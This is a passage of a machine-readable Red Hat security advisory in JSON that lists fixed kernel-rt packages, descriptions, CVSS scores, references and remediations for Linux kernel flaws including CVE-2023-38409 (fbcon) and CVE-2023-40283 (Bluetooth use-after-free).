"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval()"
},
{
"cve": "CVE-2023-38409",
"cwe": {
"id": "CWE-129",
"name": "Improper Validation of Array Index"
},
"discovery_date": "2023-07-20T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2230042"
}
],
"notes": [
{
"category": "description",
"text": "A memory corruption flaw was found in set_con2fb_map in drivers/video/fbdev/core/fbcon.c in the Framebuffer Console in the Linux kernel. This flaw allows a local attacker to crash the system, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-38409"
},
{
"category": "external",
"summary": "RHBZ#2230042",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2230042"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-38409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38409"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-38409",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38409"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=fffb0b52d5258554c645c966c6cbef7de50b851d",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=fffb0b52d5258554c645c966c6cbef7de50b851d"
}
],
"release_date": "2023-04-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "Mitigation for this issue is to skip loading the affected module \"fbcon\" onto the system until we have a fix available. This can be done by a blacklist mechanism and will ensure the driver is not loaded at boot time.\n~~~\nHow do I blacklist a kernel module to prevent it from loading automatically?\nhttps://access.redhat.com/solutions/41278 \n~~~",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment"
},
{
"cve": "CVE-2023-40283",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-08-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2231800"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Bluetooth subsystem in the Linux Kernel. This issue may allow a user to cause a use-after-free problem due to sk\u0027s children being mishandled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40283"
},
{
"category": "external",
"summary": "RHBZ#2231800",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2231800"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40283"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40283",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40283"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1728137b33c00d5a2b5110ed7aafb42e7c32e4a1",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1728137b33c00d5a2b5110ed7aafb42e7c32e4a1"
}
],
"release_date": "2023-08-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
